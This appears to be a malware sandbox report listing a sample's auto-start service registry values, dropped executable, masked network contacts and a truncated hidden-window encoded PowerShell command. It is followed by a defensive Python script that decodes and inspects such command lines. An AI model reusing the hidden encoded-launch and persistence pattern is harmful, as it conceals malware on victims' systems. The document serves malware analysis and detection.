Technical information
Registry values written (service exceavi; Start = 2 is SERVICE_AUTO_START, so the service is started at boot):
- [<HKLM>\System\CurrentControlSet\Services\exceavi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\exceavi] 'ImagePath' = '"%WINDIR%\SysWOW64\exceavi.exe"'
Executed:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...
File created:
- %HOMEPATH%\924.exe
File moved (source to destination):
- %HOMEPATH%\924.exe to %WINDIR%\syswow64\exceavi.exe
Network connections (host:port):
- '5.###.130.105':7080
- '91.##.197.90':80
- '68.##4.229.171':80
HTTP requests:
- http://www.be####lpinghand.com/wp-admin/tsh4/
- http://45.##.65.123:8080/KMmxpKWWNeN9S2Lb via 45.##.65.123
- http://21#.##0.19.232:8080/877BJ8feGhBKX2xE via 21#.#60.19.232
- http://17#.#.43.37:8080/forMMCN4oY09 via 17#.9.43.37
DNS queries:
- DNS ASK be####lpinghand.com
Command lines executed:
- '%HOMEPATH%\924.exe'
- '%WINDIR%\syswow64\exceavi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...' (with a hidden window)
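The PowerShell command line above uses -w hidden (-WindowStyle Hidden) and -en, a prefix of -EncodedCommand, whose argument is base64 over the UTF-16LE encoding of the script. The report truncates the blob, which breaks a naive base64.b64decode (bad padding, a dangling half code unit). The script below is an added example, not part of the report: it decodes such blobs tolerantly, walks a powershell.exe command line for the hidden-window and encoded-command switches, and pulls $var='literal' assignments out of the decoded text. Decoding the visible prefix of the report's own blob yields three assignments, the second of which is the string '924', the same number as the dropped %HOMEPATH%\924.exe. Function names, the token regex and the sample script used in the round-trip check are this example's own choices.

```python
import base64
import re

# Command line as listed in the report above; the trailing "..." is the
# report's own truncation, so the base64 blob is incomplete.
REPORT_CMDLINE = (
    r"'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en "
    "JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsA"
    "JABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoA"
    "YwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB..."
)

# Tokenizer for a Windows command line: quoted runs stay whole (example's own choice).
_TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
# $Name = 'literal' assignments inside the decoded script.
_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")


def encode_command(script: str) -> str:
    """Produce what powershell.exe expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Invert encode_command, tolerating a blob cut short by a sandbox report.

    Non-alphabet characters (an ellipsis, quotes, lost padding) are dropped,
    a dangling sextet that cannot form a byte is discarded, padding is
    restored, and a trailing odd byte (half a UTF-16 code unit) is removed.
    """
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    if len(b64) % 4 == 1:
        b64 = b64[:-1]
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def is_encoded_command_switch(name: str) -> bool:
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...)
    plus the alias -ec; switch matching is case-insensitive."""
    name = name.lower()
    return name == "ec" or (bool(name) and "encodedcommand".startswith(name))


def analyze_command_line(cmdline: str) -> dict:
    """Extract the hidden-window flag, the encoded blob, the decoded script and
    any $var='literal' assignments from a powershell.exe command line."""
    tokens = _TOKEN_RE.findall(cmdline)
    result = {"hidden_window": False, "encoded": None, "decoded": None, "assignments": []}
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/" or len(tok) < 2:
            continue
        name, value = tok[1:].lower(), tokens[i + 1]
        # -w / -window / -windowstyle: any prefix is accepted by powershell.exe
        if "windowstyle".startswith(name) and value.lower() == "hidden":
            result["hidden_window"] = True
        elif is_encoded_command_switch(name):
            result["encoded"] = value
    if result["encoded"] is not None:
        result["decoded"] = decode_encoded_command(result["encoded"])
        result["assignments"] = _ASSIGN_RE.findall(result["decoded"])
    return result


if __name__ == "__main__":
    report = analyze_command_line(REPORT_CMDLINE)
    print("hidden window:", report["hidden_window"])
    print("decoded prefix:", report["decoded"])
    for var, val in report["assignments"]:
        print(f"  ${var} = {val!r}")
```

On the truncated listing only the first 67 characters of the script are recoverable; fed a complete command line from a process-creation event (Sysmon event 1, Security 4688 with command-line auditing), the same function returns the whole script.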